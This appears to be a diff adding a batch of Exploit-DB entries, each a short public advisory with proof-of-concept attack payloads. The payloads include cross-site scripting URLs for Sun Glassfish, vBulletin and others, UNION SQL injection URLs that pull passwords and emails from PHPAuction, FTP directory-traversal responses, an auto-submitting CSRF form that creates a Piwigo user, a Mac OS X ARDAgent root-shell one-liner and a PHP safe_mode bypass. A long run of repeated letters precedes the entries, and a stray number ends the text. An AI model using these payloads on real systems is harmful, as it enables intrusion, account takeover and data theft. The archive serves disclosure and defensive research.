aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

9
platforms/multiple/dos/31932.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29760/info
Skulltag is prone to a vulnerability that can cause denial-of-service conditions.
A successful attack will deny service to legitimate users.
Skulltag 0.97d2-RC3 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/31932.zip

9
platforms/multiple/remote/31918.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29720/info
Crysis is prone to an information-disclosure vulnerability caused by a design error.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
Crysis 1.21 and prior versions are affected.
http://www.exploit-db.com/sploits/31918.zip

11
platforms/multiple/remote/31920.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/29741/info
Glub Tech Secure FTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP client.
Exploiting these issues will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
Secure FTP 2.5.15 for Microsoft Windows is vulnerable; other versions may also be affected.
Response to LIST:
\..\..\..\..\..\..\..\..\..\testfile.txt\r\n

26
platforms/multiple/remote/31921.txt Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/29749/info
3D-FTP is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Exploiting these issues allows an attacker to write arbitrary files to locations outside of the FTP client's current directory. This could help the attacker launch further attacks.
3D-FTP 8.01 is vulnerable; other versions may also be affected.
The following example responses are available:
Response to LIST (backslash):
-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 \..\..\..\..\..\..\..\..\..\testfile.txt\r\n
Response to LIST (forward-slash):
-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 /../../../../../../../../../testfile.txt\r\n
Response to LIST (combination):
-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n
Response to MLSD (backslash):
type=file;modify=20080227074710;size=20; \..\..\..\..\..\..\..\..\..\testfile.txt\r\n
Response to MLSD (forward-slash):
type=file;modify=20080227074710;size=20; /../../../../../../../../../testfile.txt\r\n
Response to MLSD (combination):
type=file;modify=20080227074710;size=20; ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n

20
platforms/multiple/remote/31922.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3Aproper
tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage
%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealer
t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproperty
Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27x
ss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3A
propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%2
7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%
3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%
3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSecti
onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresou
rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_
id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnewButton

22
platforms/multiple/remote/31923.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3Aprope
rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPag
e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Eale
rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert
ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%
27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet
%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3
C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectio
nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage%
3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&j
avax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElem
entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

19
platforms/multiple/remote/31924.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3Apropert
yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aprop
ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fs
cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Anam
e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyShee
t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm
%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%2
8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3
Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&p
ropertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm
_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_
focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

25
platforms/multiple/remote/31925.txt Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3Aproperty
ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Agener
alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscrip
t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType
=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralProperty
Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&proper
tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true&
propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&p
ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&prope
rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propert
yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyFo
rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&property
Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyFo
rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTab
le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3
A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Ac
ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=pro
pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_Focu
sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%

16
platforms/multiple/remote/31926.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyC
ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aproper
tSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&propertyF
orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFl
owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=
<script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_i
d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte
ntPage%3AtopButtons%3AnewButton

20
platforms/multiple/remote/31927.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3Aprope
rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=<scri
pt>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3Ap
ropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2');</scrip
t>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%
3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertySheet%3Apro
pertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');</script>
&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3A
descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSec
tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPa
ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_i
d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte
ntPage%3AbottomButtons%3AsaveButton2

16
platforms/multiple/remote/31928.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyConten
tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>alert('xs
s')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropert
ySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyForm%3Apr
opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<script>a
lert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&proper
tyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_w
ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopBu
ttons%3AnextButton

17
platforms/multiple/remote/31936.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/29784/info
UltraEdit is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP/SFTP client.
Exploiting this issue will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
UltraEdit 14.00b is vulnerable; other versions may also be affected.
Response to LIST (backslash):
\..\..\..\..\..\..\..\..\..\testfile.txt\r\n
Response to LIST (forward-slash):
/../../../../../../../../../testfile.txt\r\n
Response to LIST (backslash and forward-slash):
../..\/..\/..\/../..\/../..\/../testfile.txt\r\n

11
platforms/multiple/remote/31941.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/29844/info
WISE-FTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue allows an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
Versions prior to WISE-FTP 5.5.9 are vulnerable.
Response to LIST:
\..\..\..\..\..\..\..\..\..\testfile.txt\r\n

12
platforms/multiple/remote/31942.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29846/info
Classic FTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue allows an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
Classic FTP 1.02 for Microsoft Windows is vulnerable; other versions may also be affected.
Response to LIST:
\..\..\..\..\..\..\..\..\..\testfile.txt\r\n
/../../../../../../../../../testfile.txt\r\n

9
platforms/osx/local/31940.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29831/info
Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop).
Successful exploits allow local attackers to execute arbitrary code with superuser privileges, completely compromising the affected computer.
This issue is confirmed to affect Mac OS X 10.5 versions; earlier versions may also be vulnerable.
osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

45
platforms/php/local/31937.txt Executable file
View file

@ -0,0 +1,45 @@
source: http://www.securityfocus.com/bid/29796/info
PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized locations; other attacks are also possible.
Exploiting these issues allows attackers to obtain sensitive data that could be used in other attacks.
These vulnerabilities would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' restriction is expected to isolate users from each other.
PHP 5.2.6 is vulnerable; other versions may also be affected.
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
-rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid
is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on
line 3
/www
cxib#
---/EXAMPLE1---
---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x 2 www www 512 Jun 17 17:12 .
drwxr-xr-x 19 www www 4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#

33
platforms/php/webapps/31916.txt Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: piwigo 2.6.1 - CSRF
# Date: 26/02/2014
# Exploit Author: killall-9@mail.com
# Vendor Homepage: http://it.piwigo.org/
# Software Link: http://it.piwigo.org/basics/downloads
# Version: 2.6.1
# Tested on: Virtualbox debian
A CSRF problem is present in the administration panel.
Here it is a POF according to a derived POST:
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html lang="en">
<head>
<title>Piwigo 2.6.1</title>
</head>
<body>
<form action="http://localhost/piwigo/ws.php?format=json&method=pwg.users.add http://localhost/piwigo/ws.php?format=json&method=pwg.users.add&lang=en " id="formid" method="post">
<input name="username" value="utente" />
<input name="password" value="utente" />
<input name="email" value="utente@gmail.com http://service.mail.com/callgate-6.73.1.0/rms/6.73.1.0/mail/getBody?folderId=1&messageId=OTg2SQZUNUQ2Occvtn5u651INxBSYcL4&purpose=display&bodyType=html# "/>
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
So you can add a new arbitrary user.
cheerz°°°°

22
platforms/php/webapps/31929.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/29755/info
SimpleNotes is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/snoteindex.php?RootID=[XSS]
http://www.example.com/path/snoteindex.php?RootID=></a></td><script>alert(123)</script>
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=[XSS]
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=></a></td><script>alert(123)</script>
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=[XSS]
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=></a></td><script>alert(123)</script>
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=[XSS]
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=></a></td><script>alert(123)</script>
http://www.example.com/path/snoteform.php?RootID=[XSS]
http://www.example.com/path/snoteform.php?RootID="></a></td><script>alert(123)</script>
http://www.example.com/path/snoteform.php?RootID=1&SnoteID=[XSS]
http://www.example.com/path/snoteform.php?RootID=1&SnoteID="></a></td><script>alert(123)</script>
http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=[XSS]
http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel="></a></td><script>alert(123)</script>
http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=[XSS]
http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat="></a></td><script>alert(123)</script>

9
platforms/php/webapps/31933.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29765/info
OpenDocMan is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
OpenDocMan 1.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/opendocman-1.2.5/out.php?last_message=%3Cscript%3Ealert(document.cookie)%3C/script%3E

8
platforms/php/webapps/31935.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29771/info
Basic-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--

11
platforms/php/webapps/31938.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/29808/info
KEIL Software's photokorn is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects photokorn 1.542; other versions may be vulnerable as well.
The following proof-of-concept URI is available:
http://www.example.com/[path]/index.php?action=[SQL]

10
platforms/php/webapps/31939.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29817/info
vBulletin is prone to a cross-site scripting vulnerability that occurs in the MCP (moderation control panel) because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
vBulletin 3.7.1 PL1 and 3.6.10 PL1 are vulnerable; prior versions may also be affected.
http://www.example.com/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
http://www.example.com/vB3/modcp/index.php?redirect={XSS}

15
platforms/php/webapps/31943.html Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/29849/info
GL-SH Deaf Forum is prone to a cross-site scripting vulnerability and an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can exploit the file-upload issue to execute arbitrary code in the context of the webserver.
GL-SH Deaf Forum 6.5.5 is vulnerable; prior versions may also be affected.
<form action="http://[URL]/[Forum path]/search.php" method="post">
<tr><td class=g>XSS: <small></td><tr>
"<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT>
<br><tr><td class=g><INPUT TYPE="text" class="txt" NAME="search" SIZE="30" MAXLENGTH="100"><br/>
<tr><td class=g><INPUT TYPE="RADIO" checked NAME="type" VALUE="themen">&nbsp;search only in topics</td></tr>
<tr><td class=g><INPUT TYPE="RADIO" NAME="type" VALUE="beitraege">&nbsp;search in topics and answers</td></tr>
<INPUT TYPE="SUBMIT" class="btn" NAME="submit" VALUE="submit"></td></tr>

7
platforms/php/webapps/31944.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/29856/info
PHPAuction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*

10
platforms/php/webapps/31945.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29865/info
PEGames is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/template2.php?sitetitle=[XSS]
http://www.example.com/path/template2.php?sitenav=[XSS]
http://www.example.com/path/template2.php?sitemain=[XSS]
http://www.example.com/path/template2.php?sitealt=[XSS]

12
